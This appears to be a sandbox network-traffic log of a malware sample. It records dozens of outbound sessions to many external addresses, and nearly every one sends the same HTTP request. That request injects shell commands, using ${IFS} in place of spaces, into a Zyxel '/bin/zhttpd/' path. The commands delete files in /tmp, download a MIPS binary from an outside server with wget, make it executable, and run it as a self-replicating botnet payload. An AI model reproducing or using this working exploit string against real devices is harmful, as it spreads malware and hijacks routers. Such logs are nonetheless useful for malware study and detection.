                                                        Jan 28, 2024 10:12:54.427791119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4875192.168.2.145285854.193.97.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427841902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4876192.168.2.1442186144.147.203.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427884102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4877192.168.2.146022857.10.132.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427939892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4878192.168.2.143499677.12.222.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427958012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4879192.168.2.1438622113.34.221.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427989960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4880192.168.2.1445448200.133.6.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428030014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4881192.168.2.1451378117.6.48.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428061962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4882192.168.2.1436256155.11.228.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428095102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4883192.168.2.145883424.88.140.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428149939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4884192.168.2.145315448.66.32.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428181887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4885192.168.2.1442300176.118.121.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428225040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4886192.168.2.143969064.180.36.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428246975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4887192.168.2.1437882206.44.48.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428302050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4888192.168.2.1460704129.2.186.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428334951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4889192.168.2.1453396167.126.91.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428389072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4890192.168.2.1449972209.201.164.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428437948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4891192.168.2.14471708.215.85.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428453922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4892192.168.2.145402018.76.19.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428499937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4893192.168.2.143866223.162.161.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428544044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4894192.168.2.144756866.154.158.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428580999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4895192.168.2.1452868175.73.114.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428605080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4896192.168.2.1452826193.110.166.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428642035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4897192.168.2.1441494212.51.165.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428689957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4898192.168.2.1446548117.59.128.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428715944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4899192.168.2.1444528223.220.183.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428756952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4900192.168.2.1455458197.244.222.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428786993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4901192.168.2.1448866158.118.20.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428838015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4902192.168.2.143505688.61.22.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428888083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4903192.168.2.1450530162.40.215.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428922892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4904192.168.2.143282827.63.117.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.428956985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4905192.168.2.143809244.18.243.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429003000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4906192.168.2.1457602180.70.160.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429052114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4907192.168.2.144742466.27.125.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429122925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4908192.168.2.1455192142.38.208.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429131031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4909192.168.2.145939271.252.67.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429179907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4910192.168.2.144794088.19.230.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429218054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4911192.168.2.1454010155.136.183.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429265022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4912192.168.2.146005273.193.147.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429310083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4913192.168.2.1441874136.109.219.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429333925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4914192.168.2.1445498175.65.191.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429390907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4915192.168.2.145886877.236.33.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429434061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4916192.168.2.1452810139.14.143.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429512978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4917192.168.2.144198253.157.55.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429516077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4918192.168.2.143748454.57.214.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429569006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4919192.168.2.144616288.43.41.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429615974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4920192.168.2.1442298196.50.86.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429672956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4921192.168.2.145431470.159.96.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429702997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4922192.168.2.1447208115.148.177.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429758072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4923192.168.2.14542481.15.93.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429784060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4924192.168.2.143510879.176.169.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429824114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4925192.168.2.1449860144.143.22.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429946899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4926192.168.2.1447388140.62.235.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.429966927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4927192.168.2.144600213.173.194.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430007935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4928192.168.2.1452134210.107.64.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430052996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4929192.168.2.1459974143.179.183.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430093050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4930192.168.2.1434704126.128.240.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430121899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4931192.168.2.143312853.68.86.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430169106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4932192.168.2.1459414147.76.174.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430195093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4933192.168.2.143773276.117.173.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430243969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4934192.168.2.1444134118.63.43.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430284977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4935192.168.2.143657249.44.90.5443
                                                        TimestampBytes transferredDirectionData
